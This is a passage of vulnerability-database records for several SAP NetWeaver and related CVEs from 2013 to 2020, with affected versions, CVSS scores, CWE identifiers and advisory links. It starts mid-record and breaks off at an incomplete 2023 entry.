| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2525392 | Permissions Required |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:business_application_software_integrated_solution:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CF38D1E1-E07F-4E51-AE76-E27E7CE4F55C",
"versionEndIncluding": "7.02",
"versionStartIncluding": "7.00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:business_application_software_integrated_solution:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CB61EF9-414F-4563-B091-3E9B708CAB1E",
"versionEndIncluding": "7.11",
"versionStartIncluding": "7.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:business_application_software_integrated_solution:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D90BE6E0-559E-4509-95EA-CB820611E16D",
"versionEndIncluding": "7.52",
"versionStartIncluding": "7.50",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:business_application_software_integrated_solution:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "990D5985-7828-4D8C-9463-CA077AB3881E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:business_application_software_integrated_solution:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "341C07C1-2B4A-475D-B200-1021EB6B1F79",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:business_application_software_integrated_solution:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "4D80CC30-EE05-439F-BF2C-1267837137DE",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver, SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52, contains code that allows you to execute arbitrary program code of the user\u0027s choice. A malicious user can therefore control the behaviour of the system or can potentially escalate privileges by executing malicious code without legitimate credentials."
},
{
"lang": "es",
"value": "SAP NetWeaver y SAP BASIS, desde la versi\u00f3n 7.00 hasta la 7.02, desde la 7.10 a la 7.11, 7.30, 7.31, 7.40 y desde la versi\u00f3n 7.50 a la 7.52, contiene c\u00f3digo que permite ejecutar c\u00f3digo arbitrario del programa a elecci\u00f3n del usuario. Un usuario malicioso puede, por lo tanto, controlar el comportamiento del sistema o escalar privilegios mediante la ejecuci\u00f3n de c\u00f3digo malicioso sin credenciales leg\u00edtimas."
}
],
"id": "CVE-2018-2363",
"lastModified": "2024-11-21T04:03:40.973",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-01-09T15:29:00.370",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/102449"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/"
},
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/1906212"
},
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/2525392"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/102449"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/1906212"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/2525392"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-94"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-02-14 15:55
Modified
2024-11-21 02:05
Severity ?
Summary
Unspecified vulnerability in Message Server in SAP NetWeaver 7.20 allows remote attackers to cause a denial of service via unknown attack vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"matchCriteriaId": "53B11A3B-C559-428C-8946-7FD9FFBFA1BC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in Message Server in SAP NetWeaver 7.20 allows remote attackers to cause a denial of service via unknown attack vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad no especificada en Message Server en SAP NetWeaver 7.20 permite a atacantes remotos causar una denegaci\u00f3n de servicio a trav\u00e9s de vectores de ataque desconocidos."
}
],
"id": "CVE-2014-1963",
"lastModified": "2024-11-21T02:05:21.787",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-02-14T15:55:07.533",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/56947"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-001-sap-netweaver-message-server-dos/"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91097"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1773912"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/56947"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-001-sap-netweaver-message-server-dos/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91097"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1773912"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-09-16 19:14
Modified
2024-11-21 01:58
Severity ?
Summary
Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:sp15:*:*:*:*:*:*",
"matchCriteriaId": "ABEE6BE3-556F-4A1E-8FA3-CD5E5C1D42E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:sp8:*:*:*:*:*:*",
"matchCriteriaId": "73914503-E9AA-4382-85FC-B0DD45ABDD77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"matchCriteriaId": "2794A7DB-D5B8-467E-93F4-D65245FF187D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"matchCriteriaId": "A9805246-77E5-456C-B7CF-07CFF2F9F069",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.03:*:*:*:*:*:*:*",
"matchCriteriaId": "369D0212-65DA-4121-981B-1F07B7465F97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EDFFDB95-B956-4B22-81F4-A4074D49D4A8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad de recorrido de directorios en SAP NetWeaver 7.x permite a atacantes remotos leer ficheros arbitrarios a trav\u00e9s de vectores no especificados"
}
],
"id": "CVE-2013-5751",
"lastModified": "2024-11-21T01:58:03.113",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-09-16T19:14:40.037",
"references": [
{
"source": "cve@mitre.org",
"url": "http://en.securitylab.ru/lab/PT-2012-24"
},
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/97350"
},
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/54809"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/62391"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/87121"
},
{
"source": "cve@mitre.org",
"url": "https://websmp230.sap-ag.de/sap/support/notes/1779578"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://en.securitylab.ru/lab/PT-2012-24"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/97350"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/54809"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/62391"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/87121"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://websmp230.sap-ag.de/sap/support/notes/1779578"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2017-01-23 21:59
Modified
2024-11-21 03:27
Severity ?
Summary
The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5007E3B7-3C36-4256-9E01-51C6F52FD0FF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908."
},
{
"lang": "es",
"value": "La funci\u00f3n msp (tambi\u00e9n conocida como MSPRuntimeInterface) en el componente P4 SERVERCORE en SAP AS JAVA permite a atacantes remotos obtener informaci\u00f3n sensible del sistema aprovechando una verificaci\u00f3n de autorizaci\u00f3n perdida para la funci\u00f3n (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic o (5) getClientStatistic, vulnerabilidad tambi\u00e9n conocida como SAP Security Note 2331908."
}
],
"id": "CVE-2017-5372",
"lastModified": "2024-11-21T03:27:28.123",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-01-23T21:59:03.220",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"VDB Entry"
],
"url": "http://seclists.org/fulldisclosure/2017/Jan/50"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/93504"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"VDB Entry"
],
"url": "http://seclists.org/fulldisclosure/2017/Jan/50"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/93504"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-08-14 14:15
Modified
2024-11-21 04:16
Severity ?
Summary
A remote code execution vulnerability exists in the SAP NetWeaver UDDI Server (Services Registry), versions 7.10, 7.20, 7.30, 7.31, 7.40, 7.50. Because of this, an attacker can exploit Services Registry potentially enabling them to take complete control of the product, including viewing, changing, or deleting data by injecting code into the working memory which is subsequently executed by the application. It can also be used to cause a general fault in the product, causing the product to terminate.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2800779 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=523998017 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2800779 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=523998017 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EDFFDB95-B956-4B22-81F4-A4074D49D4A8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"matchCriteriaId": "53B11A3B-C559-428C-8946-7FD9FFBFA1BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A remote code execution vulnerability exists in the SAP NetWeaver UDDI Server (Services Registry), versions 7.10, 7.20, 7.30, 7.31, 7.40, 7.50. Because of this, an attacker can exploit Services Registry potentially enabling them to take complete control of the product, including viewing, changing, or deleting data by injecting code into the working memory which is subsequently executed by the application. It can also be used to cause a general fault in the product, causing the product to terminate."
},
{
"lang": "es",
"value": "Se presenta una vulnerabilidad de ejecuci\u00f3n de c\u00f3digo remota en SAP NetWeaver UDDI Server (Services Registry), versiones 7.10, 7.20, 7.30, 7.31, 7.40, 7.50. Debido a esto, un atacante puede explotar el Services Registry potencialmente permiti\u00e9ndoles tomar el control completo del producto, incluyendo visualizar, cambiar o eliminar datos mediante la inyecci\u00f3n de c\u00f3digo en la memoria de trabajo que posteriormente es ejecutada por la aplicaci\u00f3n. Tambi\u00e9n puede ser usada para causar un fallo general en el producto, provocando que el producto finalice."
}
],
"id": "CVE-2019-0351",
"lastModified": "2024-11-21T04:16:43.777",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-08-14T14:15:16.807",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2800779"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=523998017"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2800779"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=523998017"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-12 20:15
Modified
2024-11-21 05:35
Severity ?
Summary
Under certain conditions ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), allows an authenticated attacker to store a malicious payload which results in Stored Cross Site Scripting vulnerability.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2880869 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2880869 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:s\\/4hana:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "EEBE3705-6F2A-4FC0-8FB8-B908DDC8A4C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:s\\/4hana:7.51:*:*:*:*:*:*:*",
"matchCriteriaId": "15229BC5-B8AB-4EA3-91A9-54B080725A00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:s\\/4hana:7.52:*:*:*:*:*:*:*",
"matchCriteriaId": "DDAE64AB-5839-4177-B07E-6C24D2F27B39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:s\\/4hana:7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "87343FA6-3D2D-4F9A-8999-F3996B8C7325",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:s\\/4hana:7.54:*:*:*:*:*:*:*",
"matchCriteriaId": "E98D0261-4C52-45E1-BF8F-B2A15CE426EC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Under certain conditions ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), allows an authenticated attacker to store a malicious payload which results in Stored Cross Site Scripting vulnerability."
},
{
"lang": "es",
"value": "Bajo determinadas condiciones, ABAP Online Community en SAP NetWeaver (SAP_BASIS versi\u00f3n 7.40) y SAP S/4HANA (SAP_BASIS versiones 7.50, 7.51, 7.52, 7.53, 7.54), permite a un atacante autenticado almacenar una carga \u00fatil maliciosa que resulta en una vulnerabilidad de tipo Cross Site Scripting Almacenado."
}
],
"id": "CVE-2020-6185",
"lastModified": "2024-11-21T05:35:15.507",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "cna@sap.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-12T20:15:14.120",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2880869"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2880869"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-03-14 05:15
Modified
2024-11-21 07:36
Severity ?
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
